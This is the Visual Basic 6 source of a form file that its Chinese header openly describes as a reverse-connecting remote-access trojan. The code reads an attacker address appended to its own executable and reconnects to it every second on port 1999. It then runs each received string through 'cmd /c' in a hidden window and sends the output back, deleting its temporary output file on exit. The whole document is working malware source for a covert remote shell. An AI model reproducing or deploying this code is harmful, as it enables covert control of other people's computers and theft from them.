form1.frm

VB 远程木马,反向连接,主控端可以生成有配置信息的服务端,可以执行DOS命令

VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form Form1 
   Caption         =   "server"
   ClientHeight    =   3915
   ClientLeft      =   4275
   ClientTop       =   1920
   ClientWidth     =   5355
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   ScaleHeight     =   3915
   ScaleWidth      =   5355
   Begin VB.TextBox Text2 
      Height          =   315
      Left            =   1620
      TabIndex        =   1
      Top             =   3060
      Width           =   2655
   End
   Begin VB.Timer Timer1 
      Interval        =   1000
      Left            =   660
      Top             =   180
   End
   Begin VB.TextBox Text1 
      Height          =   1875
      Left            =   720
      MultiLine       =   -1  'True
      TabIndex        =   0
      Top             =   780
      Width           =   3555
   End
   Begin MSWinsockLib.Winsock tcpserver 
      Left            =   3960
      Top             =   180
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.Label Label1 
      Caption         =   "反弹地址："
      Height          =   315
      Left            =   720
      TabIndex        =   2
      Top             =   3120
      Width           =   975
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'定义一个
Dim sinfo As String
Const file_size = 32768

Private Sub Form_Load()
Dim snum, num As Long
Dim sappend As Byte

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
Seek #1, file_size + 1 ''将读取指针定位到文件尾部
num = FileLen(App.Path & "\" & App.EXEName & ".exe") - file_size
Dim newbyte() As Byte
ReDim newbyte(num)
For snum = 1 To num
Get #1, , newbyte(snum - 1) '读出超出模板大小的字节部分，即我们写进去的配置信息
Print suum
Next snum
sinfo = StrConv(newbyte, vbUnicode) '动态数组 转字符串（string）
Close #1

Text2.Text = sinfo
End Sub


Private Sub Timer1_Timer()
If tcpserver.State <> sckConnected Then
tcpserver.Close
tcpserver.Connect sinfo, "1999"
End If
End Sub

'接收客户端数据、执行、返回结果模块
Private Sub tcpserver_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim strData As String
Dim s As String
tcpserver.GetData strData '接收客户请求的信息
Shell "cmd /c" + strData + ">c:\windows\system32\cmd.txt", vbHide '处理接收到的命令,加上vbhide，实现无声执行
delay (200)
Text1.Text = "远程主机IP:" + tcpserver.RemoteHostIP + vbCrLf
Text1.Text = Text1.Text + "接收到字符串:" + strData + vbCrLf
Open "c:\windows\system32\cmd.txt" For Input As #1 '打开cmd.txt文件
Do While Not EOF(1) '循环至文件尾
Line Input #1, s '读入一行数据并将其赋予给变量s
tcpserver.SendData s & vbCrLf '向客户端发回执行结果
Loop
Close #1
delay (200)
End Sub
'延时设置
Sub delay(n As Integer)
Dim H As Integer
Dim T As Single
For H = 1 To n
T = Timer
Do
 DoEvents
Loop Until T <> Timer
Next H
End Sub
'删除临时文件模块
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Kill "c:\windows\system32\cmd.txt" '删除产生的临时文件cmd.txt
End Sub